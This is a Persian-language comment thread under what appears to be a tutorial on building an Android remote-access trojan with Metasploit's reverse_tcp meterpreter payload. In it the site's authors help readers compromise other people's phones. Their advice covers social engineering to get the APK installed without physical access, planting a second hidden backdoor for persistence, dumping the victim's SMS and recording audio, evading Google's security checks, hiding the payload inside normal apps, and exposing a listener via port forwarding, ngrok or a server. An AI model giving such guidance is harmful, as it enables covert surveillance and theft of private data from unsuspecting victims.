    من رات رو ساختم ولی برنامه فقط روی همون گوشی که باهاش رات رو ساختم فعال میشه و روی بقیه گوشی ها فعال نمیشه
    یعنی وقتی exploit رو مینویسم اگه برنامه روی همون گوشی که رات رو باهاش ساختم نصب باشه اینطوری رات فعال میشه و کار میکنه ولی روی گوشی دیگه ای کار نمیکنه
    میشه بفرمایید مشکل از چیه؟

    • Nima Nani اکتبر 25, 2019 پاسخ

      درود و تشکر
      احتمالا مشکل از تنظیمات اتصال شبکه شماست اول باید بفرمایید که داخل شبکه داخلی انجام میشود یا خیر ؟
      اگر از شبکه اینترنت برای اتصال استفاده می کنید باید پورت فورواردینگ انجام دهید و با استفاده از no ip یا روش های دیگر dns ثابت بگیرید که اموزش ان ها در سایت قرار داده شده است و میتوانید جستجو نمایید یا سرور مجازی بگیرید که نیازی به این کار ها نداشته باشید

  • Teodor اکتبر 25, 2019 پاسخ

    سلام داداش من msfconsole رو ک وارد میکنم ۳ تا خط نوشته میاد
    اولی rting the metasploit framework console…
    دومی warning: no database support: no database YAML file
    سومی سه تا ستارس
    بعدش باز میکنه این مراحلو میرم اخرش ک باید یدونه فایل بسازه نمیسازه راهنمایی کن تورو خدا

    • Nima Nani نوامبر 6, 2019 پاسخ

      درود
      در مرحله اخر چه اروری دریافت میکنید؟
      یک بار دستور زیر را برای اپدیت متاسپلویت خود هم وارد کنید.
      apt-get update && apt-get dist upgrade

  • Mmd اکتبر 29, 2019 پاسخ

    وقتی mafconsole رو میزنم
    یه چیزایی مینویسه ک جمله آخرش اینه
    From /uar/bin/mafconaole:48:in `<main
    لطفا بگید چطور میتونم درستش کنم

    • Nima Nani نوامبر 15, 2019 پاسخ

      درود
      فایل های متاسپلویت شما به مشکل خورده یک بار کل برنامه های سیستم عامل خود را با دستور زیر اپدیت نمایید و سپس برسی کنید مشکل حل شده است یا خیر
      apt-get update

  • علی اکتبر 30, 2019 پاسخ

    سلام من همه کا را رو کردم و روی started reverse TCP handler هست باید چقدر من منتظر نصب کردنش باشم اخه فایل ۱ مگی اینقدر طول نمیکشه ۱۵ دقیقه هست نصب نمیشه

    • Nima Nani نوامبر 15, 2019 پاسخ

      درود
      دوست عزیز این بستگی به تارگتتون داره زمان مشخصی نداره

  • javad نوامبر 11, 2019 پاسخ

    سلام وقت بخیر
    هرکار میکنم این ارور میاد
    [email protected]:~# msfconsole
    [-] ***rtinG the Metasploit Framework console…\
    [-] * WARNING: No database support: No database YAML file
    [-] ***
    فایل و میسازه اما دسترسی نمیده فایل هم تو گوشی نصب نمیشه کامل
    دستور inconfig ای پی ۱۲۷.۰.۰.۱ و میده چیکار باید بکنم

    • Nima Nani نوامبر 15, 2019 پاسخ

      درود
      با دستور زیر یک اپدیت کامل انجام دهید
      get-apt update && apt-get upgrade
      اتصال به شبکتون مشکل دارد و باید برسی کنید که به چه صورت اتصال را بر قرار کرده اید اگر از ماشین مجازی استفاده میک نید اموزش اتصال به اینترنت در vmware را مشاهده نمایید.

  • mahdi نوامبر 12, 2019 پاسخ

    سلام چرا بعد از زدن use android/meterpreter/reverse_tcp دوباره تکرار میشه و در ضمن من تمامی مراحل رو رفتم ولی درست کار نکرد میشه کمک کنید ممنون

    • Nima Nani نوامبر 15, 2019 پاسخ

      درود
      منظور شما از دوباره تکرار میشه چیست ؟
      باید شما مشکلی که دارید را به صورت دقیق بفرمایید تا بتوانیم شما را راهنمایی کنیم. می فرمایید (درست کار نکرده) ما نمیدانیم کدام بخش ایراد داشته و چه اروری داده است.

  • mahdi نوامبر 12, 2019 پاسخ

    سلام دوباره….. میشه سایتی که متاسپلویت ات رو دانلود کردی به ماهم بگید ممنون از اموزشتان

    • Nima Nani نوامبر 15, 2019 پاسخ

      درود
      متاسپلویت به صورت پیشفرض داخل سیستم عامل کالی لینوکس نصب است
      اما در صورتی که نیاز به فایل نصبی ان دارید میتوانید از لینک زیر اقدام کنید
      https://www.metasploit.com/download

  • arash دسامبر 8, 2019 پاسخ

    سلام من همه کارهارو انجام دادم به گوشی طرف هم وصل شدم ولی وقتی دستوری میزنم مثلا میزنم اس ام اس هاشو بیاره یا هر دستور دیگه ای میزنه not found لطفا بگین باید چیکار کنم

    • نیما حسینی دسامبر 16, 2019 پاسخ

      درود
      دو علت میتواند داشته باشد ۱ – کلا sms و یا موارد دیگری که تست می کنید واقعا در دستگاه وجود ندارد. ۲ – در هنگام نصب محدودیت دسترسی برای برنامه تعریف کرده اند و اجازه دسترسی به این اطلاعات را به برنامه شما نداده اند.

  • Saeed دسامبر 11, 2019 پاسخ

    با سلام می خواستم اگه امکانش هست دستور ساخت پیلود با استفاده از ddns که به جای آی پی، url وارد کنیم رو توضیح بدید، یعنی بعد از msfvenom -p android/meterpreter/reverse چی بزنیم یا داخل همین متاسپلویت دستور به چه شکل هست؟ممنون.

  • ali ژانویه 5, 2020 پاسخ

    سلام. ببخشید وقتی وصل شد دستوری هست که با زدنش اگر برنامه رو هم ببنده قطع نشه

    • نیما حسینی ژانویه 19, 2020 پاسخ

      درود
      تا زمانی که برنامه حذف نشود دسترسی دارید اما برای حل این مسئله می توانید یک برنامه مخفی دیگر با دسترسی که دارید نصب کنید که این امکان تر متاسپلویت وجود دارد و می توانید با دستور help ان ها را مشاهده کنید.

  • Mhmolanaei ژانویه 7, 2020 پاسخ

    سلام خسته نباشید
    توی فایل که روی سیستم هدف نصب میشه چطور باید دستورات موردنظرمون رو بنویسیم؟ مثلا بخوایم بگیم از صفحه اسکرین شات بگیر ایمیل کن، دستورش به چه زبانی باید نوشت؟ جاوا، بش، یا خود دستورات متا اسپلیت؟

    • نیما حسینی ژانویه 18, 2020 پاسخ

      درود و تشکر از شما
      با دستورات خود متاسپلویت می توانید بیشتر مواردی که فرمودید را انجام دهید.

  • jelfer ژانویه 9, 2020 پاسخ

    سلام بعد از اینکه دسترسی متر پرتر رو گرفتیم چه دستوراتی رو باید وارد کنیم مثلا برای دسترسی به اس ام اس باید چی بزنیم

    • نیما حسینی ژانویه 19, 2020 پاسخ

      درود از help متاسپلویت استفاده کنید برای مثال برای مشاهده اسمس ها می توانید دستور dump_sms را بزنید که البته داخل دوره کالی لینوکس به صورت کامل اموزش داده شده است.

  • محمد جواد ژانویه 15, 2020 پاسخ

    سلام چرا نمیشه ما سوال بقیه که دنبال جواب هستن بدیم اجازه این کارو نداریم

    • نیما حسینی ژانویه 18, 2020 پاسخ

      درود
      چرا می توانید پاسخ سوالات دیگران را بدهید در کنار هر دیدگاه گزینه پاسخ قرار دارد یک بار بر روی ان بزنید و سپس پاسخ را در بخش دیدگاه ارسال کنید به این صورت می توانید پاسخ سوالات دیگران را دهید.

  • snake ژانویه 26, 2020 پاسخ

    سلام ببخشید من کل اینا رو تست کردم فقط یه مشکلی دارم اونم اینه که وقتی فایل apk رو میسازم و روی گوشی خودم نصب میکنم اکسپلوت رو اجرا میکنم کار نمیکنه .فقط در صورتی کار میکنه که لپتاپی که مودم اینترنت بهش وصله گوشی هم به همون مودم وصل باشه یعنی اگه از اینترنت ایرانسل استفاده کنم اصلا کار نمیکنه
    ممنون میشم راهنمایی کنید

    • نیما حسینی ژانویه 31, 2020 پاسخ

      درود
      آموزش پورت فورواردینگ را مشاهده کنید یا می توانید از سرور مجازی برای حل این مشکل استفاده کنید.

  • justin فوریه 7, 2020 پاسخ

    با سلام و خسته نباشید !!
    من می تونم ار بعضی از دوستورات استافده کنم
    ولی مثلا دستور
    رکورد کردن صدای قربانی این رور رو میده
    Meterpreter session 8 closed. Reason: Died
    و بعد تازه هر چند دقیقه یک session رو میبنده و یکی دیگه باز میکنه
    می خواستم بدونم دلیلش چیه

    • نیما حسینی فوریه 18, 2020 پاسخ

      درود بر شما
      دسترسی قطع شده است باید برسی کنید، در صورتی که برنامه مجوز دسترسی به میکروفون را نداشته باشد این مورد ممکن است به وجود اید.

  • Ali98oo فوریه 9, 2020 پاسخ

    سلام. من هنگامی که میزنم ifconfig آی پی اصلی رو نمیده اینو میده
    ۱۲۷.۰.۰.۱
    چیکار کنم؟

    • نیما حسینی فوریه 28, 2020 پاسخ

      درود
      حتما باید به شبکه متصل باشید و از برقراری اتصال خود مطمئن شوید ، در صورتی که از سرور مجازی استفاده می کنید می توانید از ای پی سرور استفاده کنید.

  • hoseen..125 فوریه 18, 2020 پاسخ

    سلام چجوری میتونم راتو به عکس تزریق کنم وبا عکس نفوذ کنم؟

    • نیما حسینی مارس 2, 2020 پاسخ

      درود
      سوال شما بسیار کلی است ، برای این کار باید اسیب پذیری خاصی در سیستم عامل پیدا کنید که از این روش بتوانید نفوذ کنید برای مثال اموزش اسیب پذیری واتساپ را مشاهده کنید.

  • mehdier فوریه 28, 2020 پاسخ

    سلام چگونه بعد از متصل شدن به قربانی دسترسی کامل بگیریم و دسترسی ما بسته نشود

    • نیما حسینی فوریه 29, 2020 پاسخ

      درود
      برای مثال می توانید یک بکدور دیگر با نام دیگر به صورت مخفی در دستگاه موبایل نصب کنید تا در صورت حذف شدن برنامه اصلی دسترسی شما قطع نشود.

  • محمد فوریه 28, 2020 پاسخ

    برای من WARNING: No database support: No database YAML file این ارور رو میده باید چیکار کنم

    • نیما حسینی مارس 2, 2020 پاسخ

      درود
      معمولا این ارور باعث ایجاد اختلالی نمی شود که نتوانید از ابزار استفاده کنید
      اما برای حل ان از طریق ترمینال دستور msconsole را نزنید و از منو کالی لینوکس ایکن متاسپلویت را انتخاب کنید و حتما متاسپلویت خود را اپدیت کنید.

  • amirmohsen مارس 3, 2020 پاسخ

    با سلام بعد از دسترسی گرفتن از اندروید که روت هم نیست ولی بلافاصله بعد از چند ثانیه دسترسی خارج میشه برای دسترسی داشتن طولانی آموزشی دارین ممنون میشم قرار بدین

    • نیما حسینی مارس 19, 2020 پاسخ

      درود
      باید مشکل را پیدا کنید از همین روش می توانید دسترسی به صورت طولانی مدت داشته باشید که البته داخل دوره اموزش کالی لینوکس به موارد مختلفی هم در این رابطه پرداخته شد.
      ابزار ها و رات های دیگری هم در پن تست کور معرفی شده است که می توانید با کمی جستجو انها را پیدا و استفاده کنید.

  • محمدرضا مارس 16, 2020 پاسخ

    من یه سوالی داشتم … میخواستم بدونم که بعد اینکه من همه کارارو کردم میخواستم به ویندوز انتقال بدم که بعد بدمش به گوشیم ….. ترمینال رو بستم … الان چجوری میتونم همونو باز کنم ؟ از جایی که منتظر نصب طرف باشیم تا بعد از نصب کار دلخواهمونو بکنیم؟….

    • نیما حسینی مارس 20, 2020 پاسخ

      درود
      مجدد متاسپلویت را باز کنید و پیلود خود را ست کنید و تنظیمات قبل که مربوط به پورت و ای پی شما بوده است را مجدد انجام دهید.
      به این صورت می توانید از اپ نصب شده از قبل استفاده کنید.

  • aliak96 مارس 17, 2020 پاسخ

    سلام من برای این کار از سرور مجازی سایت avalserver استفاده میکنم وقتی ای پی و پورت سرور مجازی را میزنم و فایل apk ساخته میشه از کجا فایل را پیدا کنم یعنی کجای سیستم کالی ذخیره می شود ؟؟
    چون قبل از اینکه از سرور مجازی استفاده کنم apk در قسمت home سیستم عامل ذخیره میشد اما الان نه
    ممنون میشم راهنماییم کنید .

    • نیما حسینی مارس 20, 2020 پاسخ

      درود
      مسیر فایل ساخته شده به سرور مجازی مربوط نیست فایل در بخش home ذخیره می شود دقت کنید که با چه یوزری وارد شده اید و مسیر همان یوزر را برسی کنید.
      همچنین در هنگام ایجاد فایل در بخشی که نام فایل را انتخاب می کنید می توانید مسیر ذخیره فایل را هم مشخص کنید.

  • ahoura مارس 19, 2020 پاسخ

    با سلام و خسته نباشید.
    یه سوال داشتم:از کجا بفهمیم در LPORT چه عددی رو وارد کرد.با تشکر

    • نیما حسینی مارس 19, 2020 پاسخ

      درود و تشکر
      پورت های شبکه از ۱ تا ۶۵۵۳۵ هستند که می توانید از بین این پورت ها ، یک پورت را برای این موضوع اختصاص دهید
      دقت داشته باشید برای جلوگیری از ایجاد مشکل از پورت های باز و پیشفرض استفاده نکنید که برای اشنایی با ان ها باید کمی با مفاهیم شبکه اشنا باشید.

  • Mhmolana مارس 20, 2020 پاسخ

    سلام خسته نباشید
    میخواستم بدونم راهی وجود داره بدون دسترسی فیزیکی یک فایل apk رو روی سیستم هدف نصب کرد؟

    • نیما حسینی مارس 21, 2020 پاسخ

      درود و تشکر
      با روش های مهندسی اجتماعی باید فایل را طوری به تارگت ارسال کنید که ان را نصب کند و بعد از گرفتن دسترسی می توانید مجدد بودن دسترسی فیزیکی برنامه های دیگری نصب کنید.

  • عرفان مارس 26, 2020 پاسخ

    من وقتی میخوام apk رو generate کنم اخطار میده میگه
    pauload generation failed: The argument could not be parsed correctly
    چیکار کنم ؟

    • نیما حسینی آوریل 3, 2020 پاسخ

      درود
      یک بار کلا متاسپلویت را اپدیت کنید و مجدد تست کنید ببنید مشکگل حل می شود یا خیر.
      در صورتی که باز هم مشکل داشتید دستوری که وارد کرده اید را دقیقا ارسال کنید.

  • mod dp آوریل 2, 2020 پاسخ

    سلام چرا برنامه ساخته شده درگوشی قربانی نصب میشه ولی در متاسپلویت هیچ تغیری نمیکنه ولی تو گوشی خودم نصب میکنم تو متاسپلویت اجرا میشه ولی قربانی نصب میکنه هیچی اتفاقی نمی افته

    • نیما حسینی آوریل 3, 2020 پاسخ

      درود
      احتمالا شما فقط تنظیمات شبکه داخلی را انجام داده اید برای استفاده از این روش در شبکه اینترنت باید از سرور مجازی استفاده کنید یا درون سیستم خود پورت فورواردینگ انجام دهید که اموزش ان داخل سایت قرار دارد.

  • reza آوریل 4, 2020 پاسخ

    سلام واسه من تا اخرش اوکیه اما اپ روی موبایل تصب نمیشه
    مشکل از چی میتونه باشه؟
    ورژن های خاصی از اندروید نیازه که بشه پیلود رو روش نصب کرد یا روی هر ورژنی نصب میشه ؟(ورژنم ۴.۱.۲)
    یا کار دیگه ای میشه انجام داد؟

    • نیما حسینی آوریل 7, 2020 پاسخ

      درود
      احتمالا به دلیل سپر امنیتی گوگل است می توانید برای دور زدن ان از اینجا اموزش دور زدن سپر امنیتی گوگل را مشاهده کنید.

  • mod dp آوریل 4, 2020 پاسخ

    سلام آقا نیما من حتی پورت فوروارینگ انجام میدم ولی نمیدنم چرا کار نمیکنه دلیلش چی ؟ تو متاسپلویت

    • نیما حسینی آوریل 7, 2020 پاسخ

      درود
      دلیل اصلی که می تواند داشته باشد و بسیاری با ان مشکل دارند پورت فورواردینگ است طبق اموزش پورت فورواردینگ داخل سایت انجام دهید و پورت خود را با استفاده از سایت انلاین معرفی شده چک کنید.
      پیشنهاد می کنیم داخل سرور مجازی اینکار را انجام دهید تا نیازی به پورت فورواردینگ نداشته باشید.

  • Mohammad Sohani آوریل 6, 2020 پاسخ

    سلام چطوری میشه وقتی نفوذ کردیم کل یک فولدر رو دانلود کرد ؟ چون تو اموزش فقط گفته بودید دونه دونه میشه فایل های یک فولدر رو دانلود کرد ، من میخوام کل یک فولدر رو دانلود کنم
    ممنون میشم کمکم کنید

    • نیما حسینی آوریل 11, 2020 پاسخ

      درود
      می توانید با دسترسی کامند لاین یک فولدر را فشرده کنید و فایل فشرده را منتقل کنید.

  • محمد آوریل 6, 2020 پاسخ

    سلام انجام دادم ولی کار نکرد نمیدونم چرا با پورت ۴۴۴۴ و ۴۴۳ دلیلش چیه؟

    • نیما حسینی آوریل 7, 2020 پاسخ

      درود
      اگر از شبکه داخلی استفاده می کنید احتمالا ای پی صحیح وارد نکرده اید ، اگر هم داخل شبکه اینترنت اینکار را انجام می دهید احتمالا مراحل پروت فورواردینگ را به درستی انجام نداده اید.
      پیشنهاد می کنیم داخل سرور مجازی اینکار را انجام دهید.

  • محمد آوریل 6, 2020 پاسخ

    سلام ممنون میشم اینم راهنمایی کنید
    Could not install packages due to an EnvironmentError: [Errno 13] Permission denied: ‘/usr/local/lib/python3.6/site-packages/soupsieve-2.0.dist-info’
    Consider using the `–user` option or check the permissions.

    You are using pip version 10.0.1, however version 20.0.2 is available.
    You should consider upgrading via the ‘pip install –upgrade pip’ command.

    • نیما حسینی آوریل 7, 2020 پاسخ

      درود
      از نسخه قدیمی pip استفاده می کنید با دستور زیر ان را اپدیت کنید :
      pip install –upgrade pip

  • حمید آوریل 10, 2020 پاسخ

    سلام
    برای مخفی شدن میشه TORمعرفی کرد به متاسپلویت یا فقط با سرور مجازی میشه مخفی شد
    اگه TOR Lمیشه اینکارو کرد توضیح بدید ممنون

    • نیما حسینی آوریل 18, 2020 پاسخ

      درود
      خیر از تور نمی توانید برای اینکار استفاده کنید.

  • alireza3soot آوریل 11, 2020 پاسخ

    سلام
    ببخشید من تمام کار هایی رو که گفتید مو به مو انجام دادم
    روی شبیه ساز اندروید مثل بلواستکس جواب میده
    ولی رو گوشی های حقیقی خیر و زمانی که رو برنامه ها کلیک میکنم هیچ اتفاقی نمی افته
    در ضمن من از شبکه ی wifi خانگی استفاده میکنم

    • نیما حسینی آوریل 11, 2020 پاسخ

      درود
      از اتصال دستگاه موبایل به شبکه داخلیتون مطمئن شوید ، می توانید پورت فورواردینگ انجام دهید یا از سرور مجازی استفاده کنید و مجدد تست کنید.
      روی برنامه کلیک می کنید هیچ اتفاقی نباید بیفتد اما باید اتصال شما با دستگاه بر قرار شود.

  • Mhmolana آوریل 12, 2020 پاسخ

    سلام خسته نباشید
    امکانش هست که فایل مخرب رو در اسکریپت یه برنامه دیگه قرار بدیم ؟ یعنی با نصب کردن یه برنامه عادی فایل مخرب هم همراه با کدهای اون برنامه وارد سیستم بشه

    • نیما حسینی آوریل 12, 2020 پاسخ

      درود
      بله امکانش هست برای مثال داخل اموزش نفوذ به اندروید این روش اموزش داده شده است اما در متاسپلویت کمی متفاوت است که در اموزش های بعدی با این روش کار خواهیم کرد.

  • AMIR آوریل 13, 2020 پاسخ

    با سلام
    من نته گوشیم رو هات اسپات می کنم ایا لازمه که پورت فورواردینگ رو انجام بدم ؟

    • نیما حسینی آوریل 18, 2020 پاسخ

      درود
      خیر ، طبق اموزش پورت فورواردینگ قرار داده شده می توانید از روش ngrok استفاده کنید.

  • Mhmolana آوریل 14, 2020 پاسخ

    سلام خسته نباشید
    ببخشید که انقدر سورال می کنم :))
    می خواستم بدونم من که با hotspot گوشی به اینترنت وصل میشم بعد از یکبار خاموش کردن سیستم ip عوض میشه و دسترسی رو از دست میدم ؟
    دوم اینکه با همین ویروس میشه موقعیت مکانی هم بدست آورد یا نه ؟

    • نیما حسینی آوریل 25, 2020 پاسخ

      درود بر شما تشکر
      بله ، در این صورت دسترسی از بین خواهد رفت.
      با این روش می توانید از طریق ای پی محدوده کلی کلاینت را بدست اورید.

  • mm آوریل 26, 2020 پاسخ

    سلام من سوالی داشتم خدمتتون
    من اگر سرور بخرم(مهم نیست سرورم چی باشه؟ویندوز یا هر نوع لینوکسی؟؟؟
    سیستمم کالیه
    وقتی توی ترمینال اطلاعات رو وارد کنم کلا ایبی و بورت سرورم رو بزنم ؟همون واسه ست هم واسه هندلیر؟؟بعد از ساخت برنامه طرف نصب کنه
    من دیگه از توی ترمینال خود لینوکسم(روی سیستمم)میبینم؟؟؟یا باید توی سرور باشم و سرورم حتما باید کالی باشه؟

    • نیما حسینی آوریل 27, 2020 پاسخ

      درود
      سرور شما باید لینوکس باشد ،
      بله از ای پی سرور و پورت مورد نظر خود استفاده کنید.
      و از طریق اتصال به سرور می توانید کلاینت های خودتونو مدیریت کنید.

  • jack atila آوریل 30, 2020 پاسخ

    سلام خسته نباشید مرسی از اموزش های خوبتون من برای دسترسی به گوشی برای خارج از شبکه با ngrok هاست مجازی میسازم و با درستور msfvenom پیش میرم ک خارج از شبکه کنترل داشته باشم میخواستم بدونم راهی هست ک تو دستور ام اس اف ونوم برنامه رو هاید کرد یا خیر و اینکه برای قربانی پیغام اسیب به دستگاه از طرف گوگل نیاد

    • نیما حسینی می 13, 2020 پاسخ

      درود و تشکر از شما
      پیشنهاد می کنیم طبق اموزش داده شده پیش بروید، برای حل این مشکلتون می توانید اموزش دور زدن سپر امنیتی گوگل را مشاهده کنید.

  • mohammad1313 می 2, 2020 پاسخ

    سلام
    اگر بخواهم با متااسپلویت و از طریق اینترنت پابلیک از یک گوشی دسترسی بگیرم باید پورت فورواردینگ انجام بدم ؟
    ممنون

    • نیما حسینی می 13, 2020 پاسخ

      درود
      اگر از سیستم شخصی استفاده می کنید بله؛ اما اگر از سرور مجازی استفاده می کنید خیر.

  • 166._.Abolfazl می 4, 2020 پاسخ

    سلام خدمت شما
    تشکر از سایت بسار خوبتون
    من exploit رو که می زنم این رو نمایش می ده:
    Started reverse TCP handler on 192.168.50.136:6060
    میشه راهنمایی کنید لطفا…
    network هم روی NAT قرار دارد.
    ip رو درست وارد کردم.مطمئن هستم.
    لپ تاپ و موبایل هم به یک مودم جیبی متصل هستند.هر دو به یک مودم…
    میشه راهنمایی کنید ممنون می شم…

    • نیما حسینی می 17, 2020 پاسخ

      درود بر شما، تشکر
      کاملا طبیعی است متاسپلویت منتظر برقراری ارتباط است.
      برنامه اندروید را بعد از نصب اجرا کنید اتصال بر قرار می شود.

  • حسین بردبار می 16, 2020 پاسخ

    من متاسپلویت روی گوشیم نصب کردم و الان میخام فایل apk درست کردم پیدا کنم پیدا نمیکنم لطفا کمکم کنید

    • نیما حسینی می 19, 2020 پاسخ

      درود
      احتمالا در همان مسیری که هستید فایل باید ساخته شده باشد اما شما می توانید در هنگامی که در خواست ساخت apk می کنید قبل از وارد کردن نام، ادرس دایرکتوری دلخواه خود را وارد کنید.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *